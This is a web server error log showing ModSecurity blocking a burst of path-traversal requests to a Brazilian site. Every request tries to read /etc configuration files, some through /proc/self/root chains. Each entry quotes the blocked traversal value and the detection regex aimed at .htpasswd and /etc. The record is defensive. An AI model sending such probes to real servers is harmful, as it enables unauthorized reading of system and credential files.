[Fri Mar 20 11:08:15.421204 2026] [:error] [pid 26799:tid 140411691570944] [client 57.141.18.96:34330] [client 57.141.18.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/kdump.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1Uzda6ubjKNq_cu4YC4wAAA0Y"]
[Fri Mar 20 11:08:15.429491 2026] [:error] [pid 7235:tid 140411616036608] [client 74.7.241.31:33892] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1UzvqxLDW4GITHUkQSFwAAAQ8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:08:15.441822 2026] [:error] [pid 7893:tid 140411741927168] [client 57.141.18.110:34364] [client 57.141.18.110] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1UzxCii7xarUs8iHaTAgAAAgA"]
[Fri Mar 20 11:08:19.299492 2026] [:error] [pid 7893:tid 140411649607424] [client 74.7.241.31:33896] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1U0xCii7xarUs8iHaTDQAAAgs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:08:19.615480 2026] [:error] [pid 7893:tid 140411565680384] [client 57.141.18.93:34590] [client 57.141.18.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tenable_tag"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1U0xCii7xarUs8iHaTDgAAAhU"]
[Fri Mar 20 11:08:19.811515 2026] [:error] [pid 9818:tid 140411632822016] [client 57.141.18.48:34744] [client 57.141.18.48] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1U011pVZ5mVmJwsFNXkgAAAE0"]
[Fri Mar 20 11:08:21.217679 2026] [mime_magic:error] [pid 9818:tid 140411716749056] (70014)End of file found: [client 216.73.216.191:34842] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:08:24.814250 2026] [:error] [pid 15826:tid 140411741927168] [client 216.73.216.191:34924] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1U1-oXxyEfFpUF8f-o1QAAAUA"]
[Fri Mar 20 11:08:31.299180 2026] [:error] [pid 7893:tid 140411691570944] [client 57.141.18.35:35302] [client 57.141.18.35] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.allow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1U3xCii7xarUs8iHaTEwAAAgY"]
[Fri Mar 20 11:08:31.627544 2026] [:error] [pid 21219:tid 140411548894976] [client 57.141.18.27:35330] [client 57.141.18.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mke2fs.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1U3_XLqtnMIWvjpaLEEQAAApc"]
[Fri Mar 20 11:08:31.995712 2026] [:error] [pid 15826:tid 140411658000128] [client 216.73.216.191:35352] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1U3-oXxyEfFpUF8f-o3QAAAUo"]
[Fri Mar 20 11:08:32.979790 2026] [:error] [pid 10189:tid 140411607643904] [client 216.73.216.191:35432] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1U4DJ3M9BSuKP7CAZORwAAAJA"]
[Fri Mar 20 11:08:35.133786 2026] [mime_magic:error] [pid 26799:tid 140411582465792] (70014)End of file found: [client 216.73.216.191:35578] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:08:35.227717 2026] [:error] [pid 31215:tid 140411565680384] [client 57.141.18.53:35582] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1U4wF0L0L-SsrnPo6RwgAAAtU"]
[Fri Mar 20 11:08:37.072019 2026] [:error] [pid 11167:tid 140411699963648] [client 57.141.18.83:35724] [client 57.141.18.83] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/csh.cshrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1U5fHIg5MgXLBnicMeZwAAAcU"]
[Fri Mar 20 11:08:37.774759 2026] [:error] [pid 11167:tid 140411666392832] [client 74.7.241.31:59100] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1U5fHIg5MgXLBnicMeaAAAAck"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/var/run/initramfs/state/etc
[Fri Mar 20 11:08:38.527454 2026] [:error] [pid 9818:tid 140411599251200] [client 216.73.216.191:35822] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1U5l1pVZ5mVmJwsFNXpQAAAFE"]
[Fri Mar 20 11:08:41.412998 2026] [:error] [pid 11642:tid 140411741927168] [client 216.73.216.191:36022] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1U6bninkcc-iUj5AqFxgAAA4A"]
[Fri Mar 20 11:08:42.319732 2026] [:error] [pid 9818:tid 140411683178240] [client 74.7.241.31:52364] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1U6l1pVZ5mVmJwsFNXrQAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:08:43.396091 2026] [:error] [pid 10189:tid 140411649607424] [client 216.73.216.191:36138] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/x11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1U6zJ3M9BSuKP7CAZOWwAAAIs"]
[Fri Mar 20 11:08:45.821283 2026] [:error] [pid 10189:tid 140411674785536] [client 74.7.241.31:52366] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1U7TJ3M9BSuKP7CAZOYQAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:08:45.916038 2026] [:error] [pid 11167:tid 140411624429312] [client 57.141.18.106:36318] [client 57.141.18.106] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/freetds.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1U7fHIg5MgXLBnicMecAAAAc4"]
[Fri Mar 20 11:08:46.302891 2026] [:error] [pid 21219:tid 140411691570944] [client 57.141.18.84:36338] [client 57.141.18.84] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1U7vXLqtnMIWvjpaLEJgAAAoY"]
[Fri Mar 20 11:08:47.417937 2026] [:error] [pid 26799:tid 140411616036608] [client 216.73.216.191:36426] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1U79a6ubjKNq_cu4YDAgAAA08"]
[Fri Mar 20 11:08:49.450704 2026] [:error] [pid 31215:tid 140411691570944] [client 216.73.216.191:36574] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dovecot.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1U8QF0L0L-SsrnPo6R1AAAAsY"]
[Fri Mar 20 11:08:50.443787 2026] [mime_magic:error] [pid 11167:tid 140411658000128] (70014)End of file found: [client 216.73.216.191:36644] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:08:52.839808 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.241.31:52374] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1U9OoXxyEfFpUF8f-o_wAAAVI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:08:54.667074 2026] [:error] [pid 7893:tid 140411733534464] [client 57.141.18.11:36884] [client 57.141.18.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1U9hCii7xarUs8iHaTLwAAAgE"]
[Fri Mar 20 11:08:54.667542 2026] [:error] [pid 10189:tid 140411565680384] [client 74.7.241.31:49894] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1U9jJ3M9BSuKP7CAZOZwAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
